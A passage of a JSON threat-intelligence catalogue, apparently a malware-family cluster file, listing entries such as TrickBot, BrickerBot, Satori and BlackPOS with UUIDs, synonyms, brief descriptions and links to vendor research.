- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html",
- "http://blog.eset.com/2012/12/18/malicious-apache-module-used-for-content-injection-linuxchapro-a"
- ]
- }
- },
- {
- "uuid": "3d3da4c0-004c-400c-9da6-f83fd35d907e",
- "value": "Cardinal RAT",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412"
- ]
- }
- },
- {
- "uuid": "f0ff8751-c182-4e9c-a275-81bb03e0cdf5",
- "value": "BrickerBot",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/",
- "https://www.bleepingcomputer.com/news/security/brickerbot-author-claims-he-bricked-two-million-devices/",
- "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf",
- "https://www.trustwave.com/Resources/SpiderLabs-Blog/BrickerBot-mod_plaintext-Analysis/",
- "https://www.bleepingcomputer.com/news/security/brickerbot-author-retires-claiming-to-have-bricked-over-10-million-iot-devices/",
- 
"http://depastedihrn3jtw.onion/show.php?md5=2c822a990ff22d56f3b9eb89ed722c3f",
- "https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-102-01A",
- "http://seclists.org/fulldisclosure/2017/Mar/7"
- ]
- }
- },
- {
- "uuid": "54cd671e-b7e4-4dd3-9bfa-dc0ba5105944",
- "value": "ManameCrypt",
- "description": "",
- "meta": {
- "synonyms": [
- "CryptoHost"
- ],
- "type": [],
- "refs": [
- "https://www.bleepingcomputer.com/news/security/cryptohost-decrypted-locks-files-in-a-password-protected-rar-file/",
- "https://www.gdatasoftware.com/blog/2016/04/28234-manamecrypt-a-ransomware-that-takes-a-different-route"
- ]
- }
- },
- {
- "uuid": "e3e90666-bc19-4741-aca8-1e4cbc2f4c9e",
- "value": "Switcher",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://securelist.com/blog/mobile/76969/switcher-android-joins-the-attack-the-router-club/"
- ]
- }
- },
- {
- "uuid": "cbf9ff89-d35b-4954-8873-32f59f5e4d7d",
- "value": "Dummy",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://objective-see.com/blog/blog_0x32.html"
- ]
- }
- },
- {
- "uuid": "18da6a0e-abe9-4f65-91a3-2bf5a5ad29c2",
- "value": "Unidentified 047",
- "description": "RAT written in Delphi used by Patchwork APT.",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/"
- ]
- }
- },
- {
- "uuid": "53616ce4-9b8e-45a0-b380-9e778cd95ae2",
- "value": "Infy",
- "description": "",
- "meta": {
- "synonyms": [
- "Foudre"
- ],
- "type": [],
- "refs": [
- "http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/",
- "https://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/",
- "https://github.com/pan-unit42/iocs/blob/master/prince_of_persia/hashes.csv",
- "https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/"
- ]
- }
- },
- {
- 
"uuid": "4350b52a-8100-49b5-848d-d4a4029e949d",
- "value": "Bunitu",
- "description": "Bunitu is a trojan that exposes infected computers to be used as a proxy for remote clients. It registers itself at startup by providing its address and open ports. Access to Bunitu proxies is available by using criminal VPN services (e.g.VIP72).",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://zerophagemalware.com/2017/06/07/rig-ek-via-fake-eve-online-website-drops-bunitu/",
- "http://malware-traffic-analysis.net/2017/05/09/index.html",
- "https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/",
- "https://blog.malwarebytes.com/threat-analysis/2015/08/whos-behind-your-proxy-uncovering-bunitus-secrets/"
- ]
- }
- },
- {
- "uuid": "bbbef449-2fe6-4c25-a85c-69af9fa6208b",
- "value": "Joanap",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.us-cert.gov/ncas/alerts/TA18-149A",
- "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A",
- "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/"
- ]
- }
- },
- {
- "uuid": "dcc0fad2-29a9-4b69-9d75-d288ca458bc7",
- "value": "witchcoven",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www2.fireeye.com/rs/848-DID-242/images/rpt-witchcoven.pdf"
- ]
- }
- },
- {
- "uuid": "579cc23d-4ba4-419f-bf8a-f235ed33125e",
- "value": "Coreshell",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
- "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf",
- "http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware.html",
- "http://malware.prevenity.com/2014/08/malware-info.html"
- ]
- }
- },
- {
- "uuid": "467c726e-6e19-4d15-88b6-362cbe0b3d20",
- "value": "SnatchLoader",
- "description": "A downloader trojan with some infostealer capabilities focused on the 
browser. Previously observed as part of RigEK campaigns.",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://zerophagemalware.com/2017/12/11/malware-snatch-loader-reloaded/",
- "https://twitter.com/VK_Intel/status/898549340121288704",
- "https://www.arbornetworks.com/blog/asert/snatchloader-reloaded/",
- "https://myonlinesecurity.co.uk/your-order-no-8194788-has-been-processed-malspam-delivers-malware/"
- ]
- }
- },
- {
- "uuid": "15dd8386-f11a-485a-b719-440c0a47dee6",
- "value": "SHAPESHIFT",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html"
- ]
- }
- },
- {
- "uuid": "d7e31f19-8bf2-4def-8761-6c5bf7feaa44",
- "value": "Proton RAT",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.cybereason.com/labs-blog/labs-proton-b-what-this-mac-malware-actually-does",
- "https://blog.malwarebytes.com/threat-analysis/mac-threat-analysis/2017/11/osx-proton-spreading-through-fake-symantec-blog/",
- "https://objective-see.com/blog/blog_0x1D.html",
- "https://threatpost.com/handbrake-for-mac-compromised-with-proton-spyware/125518/",
- "https://objective-see.com/blog/blog_0x1F.html",
- "https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/",
- "https://www.hackread.com/hackers-selling-undetectable-proton-mac-malware/",
- "https://www.cybersixgill.com/wp-content/uploads/2017/02/02072017%20-%20Proton%20-%20A%20New%20MAC%20OS%20RAT%20-%20Sixgill%20Threat%20Report.pdf"
- ]
- }
- },
- {
- "uuid": "b8e87440-6005-459c-9a20-35516ce2fa5b",
- "value": "Lazarus",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/"
- ]
- }
- },
- {
- "uuid": "bd29030e-d440-4842-bc2a-c173ed938da4",
- "value": "Spedear",
- "description": "",
- "meta": {
- 
"synonyms": [],
- "type": [],
- "refs": [
- "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets"
- ]
- }
- },
- {
- "uuid": "9715c6bc-4b1e-49a2-b1d8-db4f4c4f042c",
- "value": "FireMalv",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf"
- ]
- }
- },
- {
- "uuid": "af6e89ec-0adb-4ce6-b4e6-610827e722ea",
- "value": "Jasus",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
- ]
- }
- },
- {
- "uuid": "70059ec2-9315-4af7-b65b-2ec35676a7bb",
- "value": "Pwnet",
- "description": "Cryptocurrency miner that was distributed masquerading as a Counter-Strike: Global Offensive hack.",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://sentinelone.com/blog/osx-pwnet-a-csgo-hack-and-sneaky-miner/"
- ]
- }
- },
- {
- "uuid": "c824813c-9c79-4917-829a-af72529e8329",
- "value": "TrickBot",
- "description": "A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tacitcs. Has multiple modules including VNC and Socks5 Proxy. 
Uses SSL for C2 communication.",
- "meta": {
- "synonyms": [
- "Trickster",
- "TheTrick",
- "TrickLoader"
- ],
- "type": [],
- "refs": [
- "https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/",
- "https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412",
- "http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html",
- "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre",
- "https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/",
- "https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/",
- "https://www.youtube.com/watch?v=KMcSAlS9zGE",
- "https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/",
- "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/",
- "http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html",
- "https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/",
- "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-2-loader",
- "https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/",
- "https://blog.fraudwatchinternational.com/malware/trickbot-malware-works",
- "https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/",
- "https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms",
- "https://blogs.forcepoint.com/security-labs/trickbot-spread-necurs-botnet-adds-nordic-countries-its-targets",
- "https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot",
- "https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html",
- "https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/",
- "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf",
- "http://www.malware-traffic-analysis.net/2018/02/01/",
- "http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot",
- "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html",
- "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/",
- "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html",
- "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-3-core",
- "https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html",
- "https://www.youtube.com/watch?v=EdchPEHnohw",
- "https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html",
- "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html",
- "https://www.youtube.com/watch?v=lTywPmZEU1A",
- "https://qmemcpy.github.io/post/reverse-engineering-malware-trickbot-part-1-packer",
- "https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf",
- "https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/"
- ]
- }
- },
- {
- "uuid": "e248d80d-de8e-45de-b6d0-3740e5b34573",
- "value": "ATI-Agent",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/"
- ]
- }
- },
- {
- "uuid": "b6b187d0-e19f-489a-91c0-7c94519555f6",
- "value": "c0d0so0",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": []
- }
- },
- {
- "uuid": "5b75db42-b8f2-4e52-81d3-f329e49e1af2",
- "value": "Manifestus",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://twitter.com/struppigel/status/811587154983981056"
- ]
- }
- },
- {
- "uuid": "70459959-5a20-482e-b714-2733f5ff310e",
- "value": "KLRD",
- "description": "",
- "meta": {
- "synonyms": 
[],
- "type": [],
- "refs": [
- "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
- "https://www.morphick.com/resources/news/klrd-keylogger"
- ]
- }
- },
- {
- "uuid": "7a38c552-0e1a-4980-8d62-1aa38617efab",
- "value": "SMSspy",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": []
- }
- },
- {
- "uuid": "19d89300-ff97-4281-ac42-76542e744092",
- "value": "Helminth",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html",
- "https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/",
- "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/"
- ]
- }
- },
- {
- "uuid": "9803b201-28e5-40c5-b661-c1a191388072",
- "value": "ScreenLocker",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://twitter.com/struppigel/status/791535679905927168"
- ]
- }
- },
- {
- "uuid": "8098d303-cb5f-4eff-b62e-96bb5ef4329f",
- "value": "Loda",
- "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. 
It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented.",
- "meta": {
- "synonyms": [
- "Nymeria"
- ],
- "type": [],
- "refs": [
- "https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware",
- "https://zerophagemalware.com/2018/01/23/maldoc-rtf-drop-loda-logger/"
- ]
- }
- },
- {
- "uuid": "31d2ce1f-44bf-4738-a41d-ddb43466cd82",
- "value": "Roaming Mantis",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://securelist.com/roaming-mantis-dabbles-in-mining-and-phishing-multilingually/85607/",
- "https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/"
- ]
- }
- },
- {
- "uuid": "69a3e0ed-1727-4a9c-ae21-1e32322ede93",
- "value": "Buzus",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": []
- }
- },
- {
- "uuid": "00764634-4a21-4c5c-8b1f-fb294c9bdd3f",
- "value": "Prikorma",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf"
- ]
- }
- },
- {
- "uuid": "0404cb3e-1390-4010-a368-80ee585ddd59",
- "value": "Dented",
- "description": "Dented is a banking bot written in C. It supports IE, Firefox, Chrome, Opera and Edge and comes with a simple POS grabber. Due to its modularity, reverse socks 5, tor and vnc can be added.",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": []
- }
- },
- {
- "uuid": "1dc53eb8-ffae-4823-9c11-3c01514398b9",
- "value": "Cuegoe",
- "description": "",
- "meta": {
- "synonyms": [
- "Windshield?" 
- ],
- "type": [],
- "refs": [
- "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html",
- "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3451",
- "http://blog.malwaremustdie.org/2014/08/another-country-sponsored-malware.html",
- "https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal"
- ]
- }
- },
- {
- "uuid": "e4e15ab4-9ba6-444a-b154-2854757e792e",
- "value": "CMSTAR",
- "description": "",
- "meta": {
- "synonyms": [
- "meciv"
- ],
- "type": [],
- "refs": [
- "https://twitter.com/ClearskySec/status/963829930776723461",
- "https://www.votiro.com/single-post/2018/02/13/New-campaign-targeting-Ukrainians-holds-secrets-in-documents-properties",
- "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan",
- "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/"
- ]
- }
- },
- {
- "uuid": "9a724a1d-7eb1-4e2b-8cc3-e1b41e8b5cff",
- "value": "Machete",
- "description": "",
- "meta": {
- "synonyms": [
- "El Machete"
- ],
- "type": [],
- "refs": [
- "https://securelist.com/el-machete/66108/",
- "https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html",
- "https://medium.com/@verovaleros/el-machete-what-do-we-know-about-the-apt-targeting-latin-america-be7d11e690e6"
- ]
- }
- },
- {
- "uuid": "6eee9bf9-ffce-4c88-a5ad-9d80f6fc727c",
- "value": "ChChes",
- "description": "",
- "meta": {
- "synonyms": [
- "Ham Backdoor"
- ],
- "type": [],
- "refs": [
- "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html",
- "https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html",
- "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/",
- "https://www.jpcert.or.jp/magazine/acreport-ChChes.html",
- 
"https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
- ]
- }
- },
- {
- "uuid": "1e62fc1f-daa7-416f-9159-099798bb862c",
- "value": "BlackPOS",
- "description": "BlackPOS infects computers running on Windows that have credit card readers connected to them and are part of a POS system. POS system computers can be easily infected if they do not have the most up to date operating systems and antivirus programs to prevent security breaches or if the computer database systems have weak administration login credentials. ",
- "meta": {
- "synonyms": [
- "Reedum",
- "POSWDS",
- "Kaptoxa"
- ],
- "type": [],
- "refs": [
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/"
- ]
- }
- },
- {
- "uuid": "c28e9055-b656-4b7a-aa91-fe478a83fe4c",
- "value": "Tyupkin",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.lastline.com/labsblog/tyupkin-atm-malware/"
- ]
- }
- },
- {
- "uuid": "f44e6d03-54c0-47af-b228-0040299c349c",
- "value": "Dexter",
- "description": "",
- "meta": {
- "synonyms": [
- "LusyPOS"
- ],
- "type": [],
- "refs": [
- "https://securitykitten.github.io/2014/12/01/lusypos-and-tor.html",
- "https://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html",
- "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Dexter-Malware--Getting-Your-Hands-Dirty/",
- "http://contagiodump.blogspot.com/2012/12/dexter-pos-infostealer-samples-and.html",
- "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/25000/PD25658/en_US/McAfee_Labs_Threat_Advisory-LusyPOS.pdf",
- "https://blog.fortinet.com/2014/03/10/how-dexter-steals-credit-card-information",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/"
- ]
- }
- },
- {
- "uuid": "7b9a9ea0-04d2-42ef-b72f-9d6476b9e0d0",
- "value": "Spamtorte",
- "description": "",
- "meta": {
- "synonyms": [], 
- "type": [],
- "refs": [
- "http://cyber.verint.com/resource/spamtorte-v2-investigating-a-multi-layered-spam-botnet/"
- ]
- }
- },
- {
- "uuid": "8420653b-1412-45a1-9a2d-6aa9b9eaf906",
- "value": "Swift?",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/"
- ]
- }
- },
- {
- "uuid": "7007b268-f6f4-4a01-9184-fc2334461c38",
- "value": "SysScan",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": []
- }
- },
- {
- "uuid": "22755fda-497e-4ef0-823e-5cb6d8701420",
- "value": "InvisiMole",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/"
- ]
- }
- },
- {
- "uuid": "3cec2c3c-1669-40cf-8612-eb826f7d2c98",
- "value": "Excalibur",
- "description": "",
- "meta": {
- "synonyms": [
- "Sabresac",
- "Saber"
- ],
- "type": [],
- "refs": [
- "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
- ]
- }
- },
- {
- "uuid": "06f63e6b-d177-4e21-b432-e3a219bc0965",
- "value": "r980",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://otx.alienvault.com/pulse/57976b52b900fe01376feb01/"
- ]
- }
- },
- {
- "uuid": "a3370013-6c47-422e-a4d4-1b86ee71e5e5",
- "value": "Miancha",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.contextis.com//documents/30/TA10009_20140127_-_CTI_Threat_Advisory_-_The_Monju_Incident1.pdf"
- ]
- }
- },
- {
- "uuid": "26aa3c43-5049-4a2e-bec1-9709b31a1a26",
- "value": "soraya",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.arbornetworks.com/blog/asert/the-best-of-both-worlds-soraya/"
- ]
- }
- },
- {
- "uuid": "33f97c52-0bcd-43f4-88bb-99e7da9f49ae",
- "value": "XP PrivEsc (CVE-2014-4076)",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- 
"https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf"
- ]
- }
- },
- {
- "uuid": "e46262cd-961f-4c7d-8976-0d35a066ab83",
- "value": "Abbath Banker",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": []
- }
- },
- {
- "uuid": "10d0115a-00b4-414e-972b-8320a2bb873c",
- "value": "DoubleLocker",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.welivesecurity.com/2017/10/13/doublelocker-innovative-android-malware/"
- ]
- }
- },
- {
- "uuid": "41bf8f3e-bb6a-445d-bb74-d08aae61a94b",
- "value": "Hide and Seek",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://labs.bitdefender.com/2018/05/hide-and-seek-iot-botnet-resurfaces-with-new-tricks-persistence/",
- "https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/"
- ]
- }
- },
- {
- "uuid": "cad83c5e-2081-4ab4-81c7-32cfc16eae66",
- "value": "CadelSpy",
- "description": "",
- "meta": {
- "synonyms": [
- "Cadelle"
- ],
- "type": [],
- "refs": [
- "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf"
- ]
- }
- },
- {
- "uuid": "e3065e43-503b-4496-921b-7601dd3d6abd",
- "value": "Auriga",
- "description": "",
- "meta": {
- "synonyms": [
- "Riodrv"
- ],
- "type": [],
- "refs": [
- "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
- ]
- }
- },
- {
- "uuid": "3521faaa-1136-4e50-9fe2-3f33359e8b1d",
- "value": "DarkMegi",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "http://stopmalvertising.com/rootkits/analysis-of-darkmegi-aka-npcdark.html",
- "http://contagiodump.blogspot.com/2012/04/this-is-darkmegie-rootkit-sample-kindly.html"
- ]
- }
- },
- {
- "uuid": "28c13455-7f95-40a5-9568-1e8732503507",
- "value": "KeyBoy",
- "description": 
"",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/",
- "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html"
- ]
- }
- },
- {
- "uuid": "a492a3e0-13cb-4b7d-93c1-027e7e69b44d",
- "value": "AbaddonPOS",
- "description": "",
- "meta": {
- "synonyms": [
- "PinkKite"
- ],
- "type": [],
- "refs": [
- "https://threatpost.com/new-pos-malware-pinkkite-takes-flight/130428/",
- "https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak"
- ]
- }
- },
- {
- "uuid": "f691663a-b360-4c0d-a4ee-e9203139c38e",
- "value": "Marcher",
- "description": "",
- "meta": {
- "synonyms": [
- "ExoBot"
- ],
- "type": [],
- "refs": [
- "https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware",
- "https://www.clientsidedetection.com/marcher.html",
- "https://www.clientsidedetection.com/exobot_v2_update___staying_ahead_of_the_competition.html"
- ]
- }
- },
- {
- "uuid": "0bc03bfa-1439-4162-bb33-ec9f8f952ee5",
- "value": "NetC",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
- ]
- }
- },
- {
- "uuid": "1482ffff-47a8-46da-8f47-d363c9d86c0e",
- "value": "Rockloader",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.proofpoint.com/us/threat-insight/post/Locky-Ransomware-Cybercriminals-Introduce-New-RockLoader-Malware"
- ]
- }
- },
- {
- "uuid": "0caf0292-b01a-4439-b56f-c75b71900bc0",
- "value": "Lazarus",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.bleepingcomputer.com/news/security/polish-banks-infected-with-malware-hosted-on-their-own-governments-site/",
- "https://twitter.com/PhysicalDrive0/status/828915536268492800",
- 
"http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html",
- "https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html"
- ]
- }
- },
- {
- "uuid": "c346faf0-9eb4-4f8a-8547-30e6641b8972",
- "value": "KrDownloader",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.fidelissecurity.com/threatgeek/2017/05/blackmoon-rising-banking-trojan-back-new-framework"
- ]
- }
- },
- {
- "uuid": "74360d1e-8f85-44d1-8ce7-e76afb652142",
- "value": "CpuMeaner",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/"
- ]
- }
- },
- {
- "uuid": "3d6c3ed5-804d-4d0b-8a01-68bc54ae8c58",
- "value": "Adylkuzz",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar"
- ]
- }
- },
- {
- "uuid": "99d83ee8-6870-4af2-a3c8-cf86baff7cb3",
- "value": "TDTESS",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "http://www.clearskysec.com/tulip/"
- ]
- }
- },
- {
- "uuid": "b933634f-81d0-41ef-bf2f-ea646fc9e59c",
- "value": "TinyZbot",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
- ]
- }
- },
- {
- "uuid": "fb75a753-24ba-4b58-b7ed-2e39b0c68c65",
- "value": "Bateleur",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor"
- ]
- }
- },
- {
- "uuid": "9e5d83a8-1181-43fe-a77f-28c8c75ffbd0",
- "value": "Satori",
- "description": "Satori is a variation of elf.mirai which was first detected around 2017-11-27 by 360 Netlab. 
It uses exploit to exhibit worm-like behaviour to spread over ports 37215 and 52869 (CVE-2014-8361).",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "http://blog.netlab.360.com/warning-satori-a-new-mirai-variant-is-spreading-in-worm-style-on-port-37215-and-52869-en/",
- "https://www.arbornetworks.com/blog/asert/the-arc-of-satori/",
- "http://blog.netlab.360.com/art-of-steal-satori-variant-is-robbing-eth-bitcoin-by-replacing-wallet-address-en/",
- "https://blog.radware.com/security/botnets/2018/02/new-satori-botnet-variant-enslaves-thousands-dasan-wifi-routers/",
- "http://www.eweek.com/security/collaborative-takedown-kills-iot-worm-satori"
- ]
- }
- },
- {
- "uuid": "5af4838f-1b4d-4f0b-bd27-50ef532e84f7",
- "value": "Urausy",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": []
- }
- },
- {
- "uuid": "13b0d9ff-0be0-4539-8c86-dfca7a0e79f6",
- "value": "ManItsMe",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
